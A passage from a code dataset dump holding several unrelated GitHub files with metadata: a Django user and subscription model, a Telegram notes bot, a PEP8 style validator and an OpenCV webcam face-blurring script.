widget.txtAvgHardBlock.text() == ''\n assert widget.txtPolydisp.text() == ''\n assert widget.txtLongPeriod.text() == ''\n assert widget.txtLocalCrystal.text() == ''\n", "repo_name": "SasView/sasview", "sub_path": "src/sas/qtgui/Perspectives/Corfunc/UnitTesting/CorfuncTest.py", "file_name": "CorfuncTest.py", "file_ext": "py", "file_size_in_byte": 7904, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 44, "dataset": "github-code", "pt": "52", "api": [{"api_name": "PySide6.QtGui.QStandardItemModel", "line_number": 25, "usage_type": "call"}, {"api_name": "PySide6.QtGui", "line_number": 25, "usage_type": "name"}, {"api_name": "sas.qtgui.Utilities.GuiUtils.Communicate", "line_number": 32, "usage_type": "call"}, {"api_name": "sas.qtgui.Utilities.GuiUtils", "line_number": 32, "usage_type": "name"}, {"api_name": "sas.qtgui.Utilities.GuiUtils.Communicate", "line_number": 35, "usage_type": "call"}, {"api_name": "sas.qtgui.Utilities.GuiUtils", "line_number": 35, "usage_type": "name"}, {"api_name": "sas.qtgui.Perspectives.Corfunc.CorfuncPerspective.CorfuncWindow", "line_number": 37, "usage_type": "call"}, {"api_name": "sas.qtgui.Plotting.PlotterData.Data1D", "line_number": 38, "usage_type": "call"}, {"api_name": "sas.qtgui.Utilities.GuiUtils", "line_number": 40, "usage_type": "argument"}, {"api_name": "PySide6.QtGui.QStandardItem", "line_number": 41, "usage_type": "call"}, {"api_name": "PySide6.QtGui", "line_number": 41, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 20, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QWidget", "line_number": 50, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets", "line_number": 50, "usage_type": "name"}, {"api_name": "pytest.mark.xfail", "line_number": 47, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 47, "usage_type": "attribute"}, {"api_name": "PySide6.QtTest.QTest.mouseClick", "line_number": 77, "usage_type": "call"}, {"api_name": "PySide6.QtTest.QTest", "line_number": 77, "usage_type": "name"}, {"api_name": "PySide6.QtCore.Qt", "line_number": 77, "usage_type": "attribute"}, {"api_name": "PySide6.QtCore", "line_number": 77, "usage_type": "name"}, {"api_name": "pytest.mark.xfail", "line_number": 72, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 72, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 84, "usage_type": "call"}, {"api_name": "os.path", "line_number": 84, "usage_type": "attribute"}, {"api_name": "os.stat", "line_number": 86, "usage_type": "call"}, {"api_name": "sasdata.dataloader.loader.Loader", "line_number": 89, "usage_type": "call"}, {"api_name": "PySide6.QtWidgets.QFileDialog", "line_number": 90, "usage_type": "attribute"}, {"api_name": "PySide6.QtWidgets", "line_number": 90, "usage_type": "name"}, {"api_name": "PySide6.QtTest.QTest.mouseClick", "line_number": 100, "usage_type": "call"}, {"api_name": "PySide6.QtTest.QTest", "line_number": 100, "usage_type": "name"}, {"api_name": "PySide6.QtCore.Qt", "line_number": 100, "usage_type": "attribute"}, {"api_name": "PySide6.QtCore", "line_number": 100, "usage_type": "name"}, {"api_name": "pytest.mark.xfail", "line_number": 80, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 80, "usage_type": "attribute"}, {"api_name": "sas.qtgui.Utilities.GuiUtils.dataFromItem", "line_number": 137, "usage_type": "call"}, {"api_name": "sas.qtgui.Utilities.GuiUtils", "line_number": 137, "usage_type": "name"}, {"api_name": "pytest.mark.xfail", "line_number": 130, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 130, "usage_type": "attribute"}, {"api_name": "pytest.mark.xfail", "line_number": 154, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 154, "usage_type": "attribute"}, {"api_name": "pytest.mark.xfail", "line_number": 166, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 166, "usage_type": "attribute"}]} +{"seq_id": "23254698900", "text": "from django.conf import settings\nfrom django.contrib.auth.models import AbstractUser\nfrom django.db import models\nfrom django.db.models import F, Q, UniqueConstraint\n\n\nclass User(AbstractUser):\n \"\"\"Модель пользователя.\"\"\"\n first_name = models.CharField(\n 'Имя',\n max_length=settings.STRING_FIELD_LENGTH,\n blank=False,\n )\n last_name = models.CharField(\n 'Фамилия',\n max_length=settings.STRING_FIELD_LENGTH,\n blank=False,\n )\n username = models.CharField(\n 'Имя пользователя',\n max_length=settings.STRING_FIELD_LENGTH,\n )\n email = models.EmailField(\n 'Почта',\n max_length=settings.EMAIL_FIELD_LENGTH,\n unique=True)\n USERNAME_FIELD = 'email'\n REQUIRED_FIELDS = ['first_name', 'last_name', 'username']\n\n class Meta:\n verbose_name = 'Пользователь'\n verbose_name_plural = 'Пользователи'\n ordering = ('username',)\n\n def __str__(self):\n return self.username\n\n\nclass Subscription(models.Model):\n \"\"\"Модель подписки.\"\"\"\n user = models.ForeignKey(\n User,\n on_delete=models.CASCADE,\n related_name='follower',\n verbose_name='Подписчик',\n )\n author = models.ForeignKey(\n User,\n on_delete=models.CASCADE,\n related_name='author',\n verbose_name='Автор')\n\n class Meta:\n verbose_name = 'Подписка'\n verbose_name_plural = 'Подписки'\n constraints = [\n UniqueConstraint(\n fields=['user', 'author'],\n name='unique_subscriptions',\n ),\n models.CheckConstraint(\n check=~Q(user=F('author')),\n name='no_self_follow')]\n ordering = ('author_id',)\n\n def __str__(self):\n return f'{self.user} подписан на {self.author}'\n", "repo_name": "JustSiddy/foodgram-project-react", "sub_path": "backend/users/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 1954, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.contrib.auth.models.AbstractUser", "line_number": 7, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 9, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 9, "usage_type": "name"}, {"api_name": "django.conf.settings.STRING_FIELD_LENGTH", "line_number": 11, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 11, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 14, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 14, "usage_type": "name"}, {"api_name": "django.conf.settings.STRING_FIELD_LENGTH", "line_number": 16, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 16, "usage_type": "name"}, {"api_name": "django.db.models.CharField", "line_number": 19, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 19, "usage_type": "name"}, {"api_name": "django.conf.settings.STRING_FIELD_LENGTH", "line_number": 21, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 21, "usage_type": "name"}, {"api_name": "django.db.models.EmailField", "line_number": 23, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 23, "usage_type": "name"}, {"api_name": "django.conf.settings.EMAIL_FIELD_LENGTH", "line_number": 25, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 25, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 39, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 39, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 41, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 41, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 43, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 43, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 47, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 47, "usage_type": "name"}, {"api_name": "django.db.models.CASCADE", "line_number": 49, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 49, "usage_type": "name"}, {"api_name": "django.db.models.UniqueConstraint", "line_number": 57, "usage_type": "call"}, {"api_name": "django.db.models.CheckConstraint", "line_number": 61, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 61, "usage_type": "name"}, {"api_name": "django.db.models.Q", "line_number": 62, "usage_type": "call"}, {"api_name": "django.db.models.F", "line_number": 62, "usage_type": "call"}]} +{"seq_id": "42318876762", "text": "from app.config import BOT_API\nfrom markUp import startMenu\nfrom app.db import User, Task, create_all_db\n\nimport telebot\nimport datetime\nbot = telebot.TeleBot(BOT_API)\nuser = User()\ntask = Task()\ncreate_all_db()\n\n@bot.message_handler(commands=['help', 'start'])\ndef send_welcome(message):\n\n user.name = message.chat.username\n user.role = 'user'\n user.tg_id = str(message.chat.id)\n user.user_is_register(str(message.chat.id))\n\n bot.send_message(message.chat.id, '''Привет, {}! \nЭто мой первый бот!\nid :{}'''.format(message.chat.username, message.chat.id), reply_markup=startMenu)\n\n\n@bot.callback_query_handler(func=lambda callback:True)\ndef callback_message(callback):\n if callback.data == 'add_new_task':\n task.date_of_creation = str(datetime.datetime.now().date())\n task.executor_id = user.get_id_by_tg_id(callback.message.chat.id)\n print(user.get_id_by_tg_id(callback.message.chat.id))\n bot.send_message(callback.message.chat.id, 'Введите дату окончания вашей заметки')\n bot.register_next_step_handler(callback.message, add_execute_date)\n \n elif callback.data == 'all_my_task': \n all_tasks = user.get_all_users_task(callback.message.chat.id)\n for tasks in all_tasks.values():\n bot.send_message(callback.message.chat.id, '''Дата создания : {}, \nДата окончания: {},\nОписание: {}'''.format(tasks['date_of_creation'], tasks['execution_date'], tasks['description']))\n\ndef add_execute_date(message):\n task.execution_date = str(message.text)\n bot.send_message(message.chat.id, 'Введите описание вашей заметки')\n bot.register_next_step_handler(message, add_desctiption)\n\ndef add_desctiption(message):\n task.description = str(message.text)\n print(task)\n task.create_task()\n bot.send_message(message.chat.id, 'Задание успешно добавлено', reply_markup=startMenu)\n\nbot.polling(non_stop=True)", "repo_name": "AlexandrYar/notes_bot", "sub_path": "app/bot/bot.py", "file_name": "bot.py", "file_ext": "py", "file_size_in_byte": 2021, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "telebot.TeleBot", "line_number": 7, "usage_type": "call"}, {"api_name": "app.config.BOT_API", "line_number": 7, "usage_type": "argument"}, {"api_name": "app.db.User", "line_number": 8, "usage_type": "call"}, {"api_name": "app.db.Task", "line_number": 9, "usage_type": "call"}, {"api_name": "app.db.create_all_db", "line_number": 10, "usage_type": "call"}, {"api_name": "markUp.startMenu", "line_number": 22, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 28, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 28, "usage_type": "attribute"}, {"api_name": "markUp.startMenu", "line_number": 50, "usage_type": "name"}]} +{"seq_id": "22788876888", "text": "import sys\nimport argparse\nimport re\nimport configparser\nimport errors.error as err\nfrom errors.error import Error\nfrom collections import deque\n\nBIN_OPERATORS1 = ('==', '=', '+=', '-=', '*=', '/=', '<=', '>=', '<', '>')\nBIN_OPERATORS2 = ('in', 'is', 'and', 'or', 'not')\nBIN_OPERATORS = BIN_OPERATORS1 + BIN_OPERATORS2\nARITHMETIC_OPERATORS = ('=', '+', '-', '*', '/')\nPUNCTUATION_MARKS = (',', ';', ':')\nBOOL_TYPES = ('True', 'False')\nOPENED_BRACKETS = ('(', '[', '{')\nCLOSED_BRACKETS = (')', ']', '}')\nBRACKETS = OPENED_BRACKETS + CLOSED_BRACKETS\nSTART_WORDS = ('def', 'class', 'if', 'while', 'for')\nQUOTES = ('\"', \"'\")\n\n\nclass Validator:\n def __init__(self, text, is_file=False):\n self.text = text\n self.is_file = is_file\n self.inline_checkers = [self.check_error0101, self.check_error0102,\n self.check_error0201, self.check_error0202,\n self.check_error0203, self.check_error0301,\n self.check_error0302, self.check_error0401,\n self.check_error0501, self.check_error0601,\n self.check_error0701, self.check_error0702,\n self.check_error0703, self.check_error0704,\n self.check_error0705, self.check_error0706,\n self.check_error0707, self.check_error0801,\n self.check_error0903, self.check_error0904,\n self.check_error0906]\n self.global_checkers = [self.check_error0901, self.check_error0905]\n self.line_number = 1\n self.errors_found = []\n self.bracket_stack = []\n self.in_class = False\n self.previous_lines = deque()\n\n def search_errors(self):\n if self.is_file:\n try:\n with open(self.text) as file:\n for line in file:\n for checker in self.inline_checkers:\n checker(line)\n self.previous_lines.append(line)\n if len(self.previous_lines) > 3:\n self.previous_lines.popleft()\n self.line_number += 1\n except FileNotFoundError:\n print('No such file: \"{}\"'.format(self.text))\n sys.exit(1)\n except Exception:\n print('May be your code in file {} have some syntax errors'\n .format(self.text))\n else:\n for checker in self.inline_checkers:\n checker(self.text)\n for checker in self.global_checkers:\n checker()\n self.errors_found.sort(key=lambda x: x.coordinates)\n\n def get_space_count(self, line):\n for (i, ch) in enumerate(line):\n if ch != ' ' and ch not in QUOTES:\n return i\n\n def is_in_quotes(self, line, index):\n in_single = False\n in_double = False\n for i in range(len(line)):\n symbol = line[i]\n if symbol == \"'\" and not in_double:\n in_single = not in_single\n if symbol == '\"' and not in_single:\n in_double = not in_double\n if i == index:\n return in_single or in_double\n\n def is_in_quadratic_bracket(self, line, index):\n in_bracket = False\n for i in range(len(line)):\n symbol = line[i]\n if symbol == \"[\":\n in_bracket = True\n if symbol == ']':\n in_bracket = False\n if i == index:\n return in_bracket\n\n def is_in_bracket(self, line, index):\n in_bracket = False\n for i in range(len(line)):\n symbol = line[i]\n if symbol == \"(\":\n in_bracket = True\n if symbol == ')':\n in_bracket = False\n if i == index:\n return in_bracket\n\n def is_for_parameter(self, line, index):\n bracket_indicator = 0\n for i in range(len(line)):\n symbol = line[i]\n if not self.is_in_quotes(line, i):\n if symbol == '(':\n bracket_indicator += 1\n elif symbol == ')':\n bracket_indicator -= 1\n if i == index:\n return bracket_indicator > 0\n\n def get_all_occurrences(self, sub, string):\n indexes = []\n start = 0\n while string.find(sub, start) != -1:\n start = string.find(sub, start) + 1\n indexes.append(start - 1)\n return indexes\n\n def check_error0101(self, line):\n if not is_space_count_multiple_four(line) and \\\n len(self.bracket_stack) == 0:\n self.errors_found.append(Error((self.line_number, 1), 'E0101'))\n\n def check_error0102(self, line):\n if self.bracket_stack:\n spaces = self.get_space_count(line)\n sub = line.lstrip()\n if sub[0] in QUOTES:\n spaces -= 1\n index = -1\n if self.bracket_stack[-1] != spaces-1:\n if spaces-1 == line[:re.search('\\S', line).start()]\\\n .count(' ')+4:\n self.errors_found.append(Error((self.line_number, spaces),\n 'E0102'))\n for i in range(len(line)):\n symbol = line[i]\n if symbol in OPENED_BRACKETS and not self.is_in_quotes(line, i):\n self.bracket_stack.append(i)\n elif symbol in CLOSED_BRACKETS and \\\n not self.is_in_quotes(line, i):\n self.bracket_stack.pop()\n\n def check_error0201(self, line):\n words = line.split()\n if words and words[0] == 'class':\n if len(words) == 1:\n self.errors_found.append(Error((self.line_number,\n line.find(words[0]) +\n len('class')),\n 'E0201'))\n elif not is_cap_word(words[1]):\n self.errors_found.append(Error((self.line_number,\n line.find(words[1])),\n 'E0201'))\n\n def check_error0202(self, line):\n words = line.split()\n if words and words[0] == 'def':\n if len(words) == 1:\n self.errors_found.append(Error((self.line_number,\n line.find(words[0]) +\n len('def')),\n 'E0202'))\n if not words[1].islower():\n self.errors_found.append(Error((self.line_number,\n line.find(words[1])),\n 'E0202'))\n\n def check_error0203(self, line):\n words = line.split()\n if words and words[0] == 'import':\n if not words[1].islower():\n self.errors_found.append(Error((self.line_number,\n line.find(words[1])),\n 'E0203'))\n\n def check_error0301(self, line):\n words = line.split()\n if words and words[0] == 'import':\n if len(words) > 2:\n if words[2] != 'as':\n self.errors_found.append(Error((self.line_number,\n line.find(words[2])),\n 'E0301'))\n\n def check_error0302(self, line):\n i = line.find(' lambda ')\n if i == -1:\n for mark in PUNCTUATION_MARKS:\n i = line.find(mark)\n if mark == ',':\n i = -1\n if i != -1:\n if not self.is_in_quotes(line, i) and \\\n not self.is_in_quadratic_bracket(line, i) and \\\n i + 1 < len(line.rstrip()) \\\n and not self.is_in_bracket(line, i):\n self.errors_found.append(Error((self.line_number, i),\n 'E0302'))\n\n def check_error0401(self, line):\n line = line.lstrip()\n i = line.find('#')\n if i != -1:\n if line[i + 1] != ' ' and not self.is_in_quotes(line, i):\n self.errors_found.append(Error((self.line_number, i),\n 'E0401'))\n\n def check_error0501(self, line):\n for boolean in BOOL_TYPES:\n line_without_spaces = line.replace(' ', '')\n i = line_without_spaces.find(boolean)\n operators = ('==', '!=', 'is', 'isnot')\n if i != -1:\n for operator in operators:\n if line_without_spaces[i - 2:i] == operator or \\\n line_without_spaces[i - 5:i] == operator:\n self.errors_found.append(Error((self.line_number, i),\n 'E0501'))\n\n def check_error0601(self, line):\n if len(line) > 79:\n self.errors_found.append(Error((self.line_number, 79), 'E0601'))\n\n def check_error0701(self, line):\n words = line.split()\n next_word = ''\n symbol_index = len(line)-len(line.lstrip())\n for i in range(len(words)):\n if i + 1 < len(words):\n next_word = words[i + 1]\n if words[i][-1] in OPENED_BRACKETS and \\\n i + 1 < len(words) and next_word not in BIN_OPERATORS:\n self.errors_found.append(Error((self.line_number,\n symbol_index+len(words[i])+1),\n 'E0701'))\n symbol_index += len(words[i])+1\n\n def check_error0702(self, line):\n words = line.split()\n previous_word = ''\n symbol_index = len(line)-len(line.lstrip())\n for i in range(len(words)):\n index = line.find(words[i])\n if words[i][0] == OPENED_BRACKETS and \\\n not self.is_in_quotes(line, index) and \\\n len(previous_word) > 0 and previous_word[-1] != ',' and \\\n previous_word not in BIN_OPERATORS:\n self.errors_found.append(Error((self.line_number,\n symbol_index+len(words[i])+1),\n 'E0702'))\n previous_word = words[i]\n symbol_index += len(words[i])+1\n\n def check_error0703(self, line):\n words = line.split()\n previous_word = ''\n symbol_index = len(line)-len(line.lstrip())\n for i in range(len(words)):\n if words[i][0] in CLOSED_BRACKETS and \\\n len(previous_word) > 0 and previous_word[-1] != ',' and \\\n previous_word not in BIN_OPERATORS:\n self.errors_found.append(Error((self.line_number,\n symbol_index+len(words[i])+1),\n 'E0703'))\n previous_word = words[i]\n symbol_index += len(words[i])+1\n\n def check_error0704(self, line):\n words = line.split()\n previous_word = ''\n symbol_index = len(line) - len(line.lstrip())\n for i in range(len(words)):\n if words[i][0] in PUNCTUATION_MARKS and \\\n len(previous_word) > 0 and previous_word[-1] != ',' and \\\n previous_word not in BIN_OPERATORS:\n self.errors_found.append(Error((self.line_number,\n symbol_index+len(words[i])+1),\n 'E0704'))\n previous_word = words[i]\n\n def check_error0705(self, line):\n # Unexpected spaces around keyword / parameter equals\n indexes = self.get_all_occurrences('=', line)\n for index in indexes:\n if not self.is_in_quotes(line, index) and \\\n self.is_for_parameter(line, index) and\\\n line[index-1] != '=' and line[index-1] != '!' and\\\n line[index+1] != '=':\n if line[index - 1] == ' ':\n i = 2\n while line[index - i] == ' ':\n i += 1\n self.errors_found.append(Error((self.line_number,\n index - i + 2),\n 'E0705'))\n if line[index + 1] == ' ':\n i = 2\n while line[index + i] == ' ':\n i += 1\n self.errors_found.append(Error((self.line_number,\n index + i),\n 'E0705'))\n\n # Missing whitespace around operator\n def check_error0706(self, line):\n for operator in BIN_OPERATORS2:\n indexes = self.get_all_occurrences(operator, line)\n for index in indexes:\n if line[index] and not line[index - 1].isalpha() and \\\n not line[index + len(operator)].isalpha() and \\\n line[index - 1] not in ARITHMETIC_OPERATORS and \\\n not self.is_in_quotes(line, index):\n if (line[index - 1] == ')' or line[index - 1] == '(')\\\n and line[index:index+3] != 'not':\n self.errors_found.append(Error((self.line_number,\n index - 1),\n 'E0706'))\n if line[index + len(operator)] == ')' or \\\n line[index + len(operator)] == ')':\n self.errors_found.append(Error((self.line_number,\n index+len(operator)),\n 'E0706'))\n for operator in BIN_OPERATORS1:\n indexes = self.get_all_occurrences(operator, line)\n for index in indexes:\n if line[index - 1] not in ARITHMETIC_OPERATORS and \\\n line[index - 1] != '!' and \\\n line[index - 1] != '>' and \\\n line[index - 1] != '<' and \\\n line[index - 1] != '=' and \\\n line[index + 1] != '=' and \\\n not self.is_in_quotes(line, index) and \\\n not self.is_for_parameter(line, index) and \\\n len(self.bracket_stack) > 0:\n if line[index - 1] != ' ':\n self.errors_found.append(Error((self.line_number,\n index - 1),\n 'E0706'))\n if line[index + len(operator)] != ' ':\n self.errors_found.append(Error((self.line_number,\n index +\n len(operator) + 1),\n 'E0706'))\n\n def check_error0707(self, line):\n line = line.lstrip()\n for operator in BIN_OPERATORS:\n indexes = self.get_all_occurrences(operator, line)\n for index in indexes:\n if line[index - 1] not in ARITHMETIC_OPERATORS and \\\n not self.is_in_quotes(line, index):\n if line[index - 1] == ' ':\n if line[index - 2] == ' ':\n i = 2\n while line[index - i] == ' ':\n i += 1\n self.errors_found.append(Error((self.line_number,\n i),\n 'E0707'))\n if line[index + len(operator)] == ' ':\n if line[index + len(operator) + 1] == ' ':\n i = len(operator) + 1\n while line[index + 1] == ' ':\n i += 1\n self.errors_found.append(Error((self.line_number,\n index + i),\n 'E0707'))\n\n def check_error0801(self, line):\n indexes = self.get_all_occurrences(' lambda ', line)\n for i in indexes:\n if not self.is_in_quotes(line, i):\n self.errors_found.append(Error((self.line_number, i),\n 'E0801'))\n\n def check_error0901(self):\n if self.is_file and self.previous_lines[-1][-1] != '\\n':\n self.errors_found.append(Error((self.line_number, 0), 'E0901'))\n\n def check_error0902(self, line):\n if line.startswith('class') and \\\n len(self.previous_lines) >= self.line_number:\n if self.previous_lines[self.line_number - 1] != ' ' and \\\n self.previous_lines[self.line_number - 2] != ' ' and \\\n self.previous_lines[self.line_number - 3] == ' ':\n self.errors_found.append(Error((self.line_number,\n line.find('class')), 'E0902'))\n\n def check_error0903(self, line):\n if (line.startswith('def') or line.startswith('class'))\\\n and self.line_number > 2:\n if not (self.previous_lines[-1].isspace() and\n self.previous_lines[-2].isspace()):\n self.errors_found.append(Error((self.line_number, 1),\n 'E0903'))\n elif self.line_number > 3 and self.previous_lines[-3].isspace():\n self.errors_found.append(Error((self.line_number, 1),\n 'E0903'))\n\n def check_error0904(self, line):\n if (line.lstrip().startswith('def') and self.line_number > 2 and\n not self.previous_lines[-1].lstrip().startswith('class') and\n not self.previous_lines[-1].lstrip().startswith('def') and\n not self.previous_lines[-1].lstrip().startswith('#') and\n re.match('\\s', line)):\n if not self.previous_lines[-1].isspace() or\\\n self.previous_lines[-2].isspace():\n self.errors_found.append(Error((self.line_number,\n str.find('def', line)+1),\n 'E0904'))\n\n def check_error0905(self):\n if self.is_file and self.previous_lines[-1] == '\\n' and \\\n self.previous_lines[-2][-1] == '\\n':\n self.errors_found.append(Error((self.line_number, 1), 'E0905'))\n\n def check_error0906(self, line):\n if (re.match('\\S', line.lstrip()) and self.line_number > 2 and\n self.previous_lines[-1].isspace() and\n self.previous_lines[-2].isspace()):\n if re.match('\\s', line):\n self.errors_found.append(Error((self.line_number, 1),\n 'E0906'))\n elif self.line_number > 3 and self.previous_lines[-3].isspace():\n self.errors_found.append(Error((self.line_number, 1),\n 'E0906'))\n\n\ndef main():\n errors = {}\n parser = argparse.ArgumentParser(description='Check code for PEP8.')\n parser.add_argument('--files', nargs='*',\n help='Check transferred files to PEP8')\n parser.add_argument('string', nargs='*')\n parser.add_argument('--language', nargs=1,\n help='You can choose language: english')\n arguments = parser.parse_args()\n\n config = configparser.ConfigParser()\n config.read('errors/settings.ini')\n settings = config['Languages']\n if arguments.language:\n language = arguments.language[0]\n if language in err.__LANGUAGES:\n settings['Language'] = language\n else:\n print(\"I don't know this language: \\\"{}\\\"\".format(language))\n settings['Language'] = 'english'\n else:\n settings['Language'] = 'english'\n with open('errors/settings.ini', 'w') as file:\n config.write(file)\n\n if arguments.files:\n for file_name in arguments.files:\n validator = Validator(file_name, is_file=True)\n try:\n validator.search_errors()\n except Exception:\n print('May be your code in file \"{}\" have some syntax errors'\n .format(file_name))\n errors[file_name] = validator.errors_found\n else:\n validator = Validator(' '.join(arguments.string))\n try:\n validator.search_errors()\n except Exception:\n print('May be your string \"{}\" have some syntax errors'\n .format(' '.join(arguments.string)))\n errors['string'] = validator.errors_found\n errors_is_found = False\n if errors:\n for file in errors:\n print('{}:'.format(file))\n if errors[file]:\n errors_is_found = True\n for error in errors[file]:\n error.write()\n else:\n print('OK')\n print('\\n')\n if errors_is_found:\n sys.exit(1)\n\n\ndef is_space_count_multiple_four(line):\n for (i, ch) in enumerate(line):\n if ch != ' ':\n return i % 4 == 0\n\n\ndef is_cap_word(word):\n return word[0].istitle() and word.find('_') == -1\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "gafetinov/pep8_validator", "sub_path": "validator.py", "file_name": "validator.py", "file_ext": "py", "file_size_in_byte": 22159, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "collections.deque", "line_number": 42, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 57, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 130, "usage_type": "call"}, {"api_name": "re.search", "line_number": 140, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 142, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 156, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 161, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 169, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 174, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 182, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 191, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 207, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 215, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 227, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 232, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 243, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 258, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 272, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 286, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 303, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 310, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 325, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 330, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 346, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 350, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 367, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 375, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 383, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 388, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 396, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 404, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 407, "usage_type": "call"}, {"api_name": "re.match", "line_number": 415, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 418, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 425, "usage_type": "call"}, {"api_name": "re.match", "line_number": 428, "usage_type": "call"}, {"api_name": "re.match", "line_number": 431, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 432, "usage_type": "call"}, {"api_name": "errors.error.Error", "line_number": 435, "usage_type": "call"}, {"api_name": "errors.error", "line_number": 440, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 441, "usage_type": "call"}, {"api_name": "configparser.ConfigParser", "line_number": 449, "usage_type": "call"}, {"api_name": "errors.error.__LANGUAGES", "line_number": 454, "usage_type": "attribute"}, {"api_name": "errors.error", "line_number": 454, "usage_type": "name"}, {"api_name": "errors.error", "line_number": 472, "usage_type": "name"}, {"api_name": "errors.error", "line_number": 480, "usage_type": "name"}, {"api_name": "errors.error", "line_number": 482, "usage_type": "name"}, {"api_name": "errors.error", "line_number": 483, "usage_type": "name"}, {"api_name": "errors.error", "line_number": 485, "usage_type": "name"}, {"api_name": "errors.error", "line_number": 487, "usage_type": "name"}, {"api_name": "sys.exit", "line_number": 493, "usage_type": "call"}]} +{"seq_id": "73102960804", "text": "import cv2\n\ncascade = cv2.CascadeClassifier('frontal_face.xml')\n\n\ndef find_and_blur(bw_image, orig_image):\n # detect all faces\n faces = cascade.detectMultiScale(bw_image, 1.1, 4)\n # get the location of all the faces\n\n for (x, y, w, h) in faces:\n # select the areas where the face was found\n roi_color = orig_image[y:y+h, x:x+w]\n\n # blur the colored image\n blur = cv2.GaussianBlur(roi_color, (101,101), 0)\n\n # Insert the ROI back into the image\n orig_image[y:y+h, x:x+w] = blur\n\n return orig_image\n\ncap = cv2.VideoCapture(0)\n\nwhile True:\n # get last recorded frame\n _, color = cap.read()\n\n # transform color -> grayscale\n bw = cv2.cvtColor(color, cv2.COLOR_BGR2GRAY)\n # detect the face and blur it\n blur = find_and_blur(bw, color)\n # display output\n cv2.imshow('Video', blur)\n # break if q is pressed\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n# turn camera off\ncap.release()\n# close camera window\ncv2.destroyAllWindows()", "repo_name": "JamesPeralta/WorkoutRecognitionThesis", "sub_path": "blur_faces_alg/face_blur.py", "file_name": "face_blur.py", "file_ext": "py", "file_size_in_byte": 1019, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "cv2.CascadeClassifier", "line_number": 3, "usage_type": "call"}, {"api_name": "cv2.GaussianBlur", "line_number": 16, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 23, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 30, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 30, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 34, "usage_type": "call"}, {"api_name": 